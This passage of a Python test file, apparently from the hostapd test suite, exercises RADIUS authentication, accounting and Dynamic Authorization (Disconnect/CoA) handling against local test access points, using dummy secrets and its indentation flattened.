if int(mib["radiusAuthClientAccessRetransmissions"]) < 1:
raise Exception("Missing RADIUS Authentication retransmission")
def test_radius_auth_unreachable3(dev, apdev):
"""RADIUS Authentication server initially unreachable, but then available"""
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.18"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('auth_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
def test_radius_acct_unreachable(dev, apdev):
"""RADIUS Accounting server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 2:
raise Exception("Missing RADIUS Accounting retransmissions")
if int(mib["radiusAccClientPendingRequests"]) < 2:
raise Exception("Missing pending RADIUS Accounting requests")
def test_radius_acct_unreachable2(dev, apdev):
"""RADIUS Accounting server unreachable(2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 1 and int(mib["radiusAccClientPendingRequests"]) < 1:
raise Exception("Missing pending or retransmitted RADIUS Accounting requests")
def test_radius_acct_unreachable3(dev, apdev):
"""RADIUS Accounting server initially unreachable, but then available"""
require_under_vm()
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.18"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('acct_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
time.sleep(1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalResponses'])
req_e = int(as_mib_end['radiusAccServTotalResponses'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_unreachable4(dev, apdev):
"""RADIUS Accounting server unreachable and multiple STAs"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
for i in range(20):
connect(dev[0], "radius-acct")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_radius_acct(dev, apdev):
"""RADIUS Accounting"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_auth_req_attr'] = [ "126:s:Operator", "77:s:testing",
"62:d:1" ]
params['radius_acct_req_attr'] = [ "126:s:Operator", "62:d:1",
"77:s:testing" ]
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
dev[2].connect("radius-acct", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
logger.info("Checking for RADIUS counters")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 3:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_non_ascii_ssid(dev, apdev):
"""RADIUS Accounting and non-ASCII SSID"""
params = hostapd.wpa2_eap_params()
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
ssid2 = "740665007374"
params['ssid2'] = ssid2
hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid2=ssid2, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef")
def test_radius_acct_pmksa_caching(dev, apdev):
"""RADIUS Accounting with PMKSA caching"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
for d in [ dev[0], dev[1] ]:
d.request("REASSOCIATE")
d.wait_connected(timeout=15, error="Reassociation timed out")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 4:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_interim(dev, apdev):
"""RADIUS Accounting interim update"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS counters")
as_mib_start = as_hapd.get_mib(param="radius_server")
time.sleep(3.1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 3:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable(dev, apdev):
"""RADIUS Accounting interim update with unreachable server"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(3.1)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable2(dev, apdev):
"""RADIUS Accounting interim update with unreachable server (retry)"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
# Use long enough interim update interval to allow RADIUS retransmission
# case (3 seconds) to trigger first.
params['radius_acct_interim_interval'] = "4"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(7.5)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_ipaddr(dev, apdev):
"""RADIUS Accounting and Framed-IP-Address"""
try:
_test_radius_acct_ipaddr(dev, apdev)
finally:
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def _test_radius_acct_ipaddr(dev, apdev):
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'proxy_arp': '1',
'ap_isolate': '1',
'bridge': 'ap-br0' }
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
try:
hapd.enable()
except:
# For now, do not report failures due to missing kernel support
raise HwsimSkip("Could not start hostapd - assume proxyarp not supported in kernel version")
bssid = apdev[0]['bssid']
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
addr0 = dev[0].own_addr()
pkt = build_dhcp_ack(dst_ll="ff:ff:ff:ff:ff:ff", src_ll=bssid,
ip_src="192.168.1.1", ip_dst="255.255.255.255",
yiaddr="192.168.1.123", chaddr=addr0)
if "OK" not in hapd.request("DATA_TEST_FRAME ifname=ap-br0 " + binascii.hexlify(pkt)):
raise Exception("DATA_TEST_FRAME failed")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.disable()
def send_and_check_reply(srv, req, code, error_cause=0):
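    # Send a RADIUS DAS request and verify the response code (and Error-Cause when one is expected)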
reply = srv.SendPacket(req)
logger.debug("RADIUS response from hostapd")
for i in reply.keys():
logger.debug("%s: %s" % (i, reply[i]))
if reply.code != code:
raise Exception("Unexpected response code")
if error_cause:
if 'Error-Cause' not in reply:
raise Exception("Missing Error-Cause")
if reply['Error-Cause'][0] != error_cause:
raise Exception("Unexpected Error-Cause: {}".format(reply['Error-Cause']))
def test_radius_acct_psk(dev, apdev):
"""RADIUS Accounting - PSK"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", psk="12345678", scan_freq="2412")
def test_radius_acct_psk_sha256(dev, apdev):
"""RADIUS Accounting - PSK SHA256"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
def test_radius_acct_ft_psk(dev, apdev):
"""RADIUS Accounting - FT-PSK"""
as_hapd = hostapd.Hostapd("as")
params = ft_params1(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="FT-PSK",
psk="12345678", scan_freq="2412")
def test_radius_acct_ieee8021x(dev, apdev):
"""RADIUS Accounting - IEEE 802.1X"""
skip_with_fips(dev[0])
as_hapd = hostapd.Hostapd("as")
params = hostapd.radius_params()
params["ssid"] = "radius-acct-1x"
params["ieee8021x"] = "1"
params["wep_key_len_broadcast"] = "13"
params["wep_key_len_unicast"] = "13"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct-1x", key_mgmt="IEEE8021X", eap="PSK",
identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
scan_freq="2412")
def test_radius_das_disconnect(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret="secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with incorrect secret")
req = radius_das.DisconnectPacket(dict=dict, secret="incorrect",
User_Name="foo",
NAS_Identifier="localhost",
Event_Timestamp=int(time.time()))
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with incorrect secret properly ignored")
logger.info("Disconnect-Request without Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
User_Name="psk.user@example.com")
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request without Event-Timestamp properly ignored")
logger.info("Disconnect-Request with non-matching Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
User_Name="psk.user@example.com",
Event_Timestamp=123456789)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
User_Name="foo",
User_Password="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 401)
logger.info("Disconnect-Request with invalid Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
User_Name="foo",
Calling_Station_Id="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 407)
logger.info("Disconnect-Request with mismatching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
User_Name="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Calling_Station_Id="12:34:56:78:90:aa",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Acct_Session_Id="12345678-87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Acct_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Acct_Multi_Session_Id="12345678+87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Acct_Multi_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with no session identification attributes")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with mismatching NAS-IP-Address")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="192.168.3.4",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
logger.info("Disconnect-Request with mismatching NAS-Identifier")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_Identifier="unknown.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED", "CTRL-EVENT-CONNECTED"])
if ev is None:
raise Exception("Timeout while waiting for re-connection")
if "CTRL-EVENT-EAP-STARTED" not in ev:
raise Exception("Unexpected skipping of EAP authentication in reconnection")
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id and non-matching CUI")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Calling_Station_Id=addr,
Chargeable_User_Identity="foo@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
logger.info("Disconnect-Request with matching CUI")
dev[1].connect("radius-das", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[1].wait_disconnected(timeout=10)
dev[1].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
connect(dev[2], "radius-das")
logger.info("Disconnect-Request with matching User-Name - multiple sessions matching")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=508)
logger.info("Disconnect-Request with User-Name matching multiple sessions, Calling-Station-Id only one")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[2].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id after disassociation")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
logger.info("Disconnect-Request with matching User-Name after disassociation")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
dev[2].request("DISCONNECT")
dev[2].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
User_Name="psk.user@example.com",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching CUI after disassociation")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching Calling-Station-Id after disassociation")
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with mismatching Calling-Station-Id after disassociation")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
def add_message_auth_req(req):
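    # Build the Message-Authenticator attribute: HMAC-MD5 (hmac's default) over the packet
    # with the Request Authenticator and the attribute's own value zeroed out, per RFC 5176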
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator", 16*"\x00")
attrs = req._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(16*"\x00") # all zeros Authenticator in calculation
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_das_disconnect_time_window(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect - time window"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['radius_das_require_message_authenticator'] = "1"
params['radius_das_time_window'] = "10"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].own_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret="secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()) - 50)
add_message_auth_req(req)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
add_message_auth_req(req)
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
def test_radius_das_coa(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - CoA"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret="secret", dict=dict)
srv.retries = 1
srv.timeout = 1
# hostapd does not currently support CoA-Request, so NAK is expected
logger.info("CoA-Request with matching Acct-Session-Id")
req = radius_das.CoAPacket(dict=dict, secret="secret",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.CoANAK, error_cause=405)
def test_radius_ipv6(dev, apdev):
"""RADIUS connection over IPv6"""
params = {}
params['ssid'] = 'as'
params['beacon_int'] = '2000'
params['radius_server_clients'] = 'auth_serv/radius_clients_ipv6.conf'
params['radius_server_ipv6'] = '1'
params['radius_server_auth_port'] = '18129'
params['radius_server_acct_port'] = '18139'
params['eap_server'] = '1'
params['eap_user_file'] = 'auth_serv/eap_user.conf'
params['ca_cert'] = 'auth_serv/ca.pem'
params['server_cert'] = 'auth_serv/server.pem'
params['private_key'] = 'auth_serv/server.key'
hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="radius-ipv6")
params['auth_server_addr'] = "::0"
params['auth_server_port'] = "18129"
params['acct_server_addr'] = "::0"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['own_ip_addr'] = "::0"
hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-ipv6")
def test_radius_macacl(dev, apdev):
"""RADIUS MAC ACL"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
# Invalid VLAN ID from RADIUS server
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[2].request("REMOVE_NETWORK all")
dev[2].wait_disconnected()
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
def test_radius_macacl_acct(dev, apdev):
"""RADIUS MAC ACL and accounting enabled"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
